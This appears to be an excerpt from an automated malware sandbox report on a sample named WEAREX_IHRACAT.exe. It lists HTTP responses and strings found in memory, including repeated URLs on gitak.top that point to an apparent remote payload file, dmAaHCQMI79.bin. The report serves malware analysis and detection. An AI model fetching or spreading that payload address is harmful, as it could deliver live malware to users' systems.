      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 43Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAyowupOWb5VXJ8gC4tntqPW5lHx8Wi31AqO8BiSuyacK%2BvW%2Bj8bdTSJccpv2AWsWdcPSFfIJC7JQrZwlmmGQw%2FXHYGg793%2F%2BJA0Oo8Nv7kyTTDfZi4IsfhJB%2F4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1ba687f1ffa-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 53Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUQZXjbzj6ju5s79yPBAjZRr5ZbQySffRYXyCiog5C98MrYxjtX4dfqOvzHoEREzjEpqkWEcgtlnPMoUI77jkK34azHbAEx6NuWJoGWLZ0hVfIDXRrbRWywH9Fw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1fc3cdb8292-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 64Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jz7VFTiPKQF%2BrRLpb7vN69gK1%2BcUzeYu3BFQsHzO%2FmQB7Hoyaz7PP2PEJ91Iqz4OhWro%2BvS41XUpNsShp%2FwWXGND%2BNVq9DVAV5IhPeLjK9dkC%2FnuyGJawWmzKiU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf23dfbae9c19-IADalt-svc: h3=":443"; ma=86400
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: WEAREX_IHRACAT.exe, Caterva.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/7~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/9~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/A~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/K~v
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/My
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/M~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/W~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/Y~
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binM~
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binNJ
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binR
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binW~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binX
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binY~
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bince
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binc~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bine~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 